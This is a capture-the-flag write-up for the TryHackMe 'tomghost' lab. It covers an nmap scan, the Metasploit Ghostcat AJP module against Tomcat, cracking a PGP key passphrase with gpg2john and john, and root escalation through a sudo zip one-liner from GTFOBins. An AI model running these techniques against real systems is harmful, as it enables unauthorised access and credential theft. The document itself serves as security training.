https://tryhackme.com/room/tomghost

💭 Thoughts after doing the room

I had to look up gpg commands, because I rarely use them, but all in all this room was pretty straightforward from nmap, to metasploit to sudo privileges.

nmap

First I do a rough scan with nmap

┌──(toor㉿kali1)-[~/tryhackme]
└─$ nmap -A -T4 10.10.79.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-02 22:27 CET
Nmap scan report for 10.10.79.57
Host is up (0.032s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.33 seconds

There I see that tomcat is installed, the web interface is on 8080, and Apache jserv on Port 8009.

nmap shows the Tomcat version, which I’ll confirm in the webinterface.

I search the web for tomcat 9.0.30 CVE and

https://www.cvedetails.com/version/644763/Apache-Tomcat-9.0.30.html

is one of the first hits. 2 code execution CVEs from 2020, one with a score of 9.8.

metasploit

On metasploit I search with search ajp

the first one looks like the right one.

With show options I check the required options

Everything seems right, I don’t know what /WEB-INF/web.xml is, so I ask ChatGPT

With set rhosts 10.10.79.57 I provide the IP and with exploit I start the process:

And see a username and password.

trying to log in

I search what the management URL for tomcat is (host/manager/html), but I can’t access it that way.

Earlier with nmap I saw that the ssh service is also running, so I try the user/pass combo there.

Login successful. I check if I have sudo rights

skyfuck@ubuntu:~$ sudo -l
[sudo] password for skyfuck:
Sorry, user skyfuck may not run sudo on ubuntu.

nope, but there are 2 files in the home directory

skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc

I copy those files over to my host with scp

We somehow need to get the keys out of the ASC file (ASCII-armored). For this I use

gpg2john tryhackme.asc > tomhash

and then crack this with

john --wordlist=/usr/share/wordlists/rockyou.txt tomhash

Import the key:

┌──(toor㉿kali1)-[~/tryhackme/tomghost]
└─$ gpg --import tryhackme.asc             
gpg: key 8F3DA3DEC6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key 8F3DA3DEC6707170: secret key imported
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

which requires the passphrase.

┌──(toor㉿kali1)-[~/tryhackme/tomghost]
└─$ gpg --decrypt credential.pgp           
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
XXXXXX

I can login as another user with this info. Either with su or with another ssh session. Then I check the sudo rights, which allows to execute /usr/bin/zip as root.

┌──(toor㉿kali1)-[~/tryhackme/tomghost]
└─$ ssh merlin@10.10.79.57
merlin@10.10.79.57's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Tue Mar 10 22:56:49 2020 from 192.168.85.1
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

Then I check the user directory, which contains the first flag.

Now trying to get root via the handy gtfobins

https://gtfobins.github.io/gtfobins/zip/

It wasn’t clear to me what the line sudo zip $TF /etc/hosts -T -TT 'sh #' does, so I ask Chat GPT 3.5, the answer wasn’t good enough, so I asked Chat GPT 4.0

I execute the commands and it leads to the root flag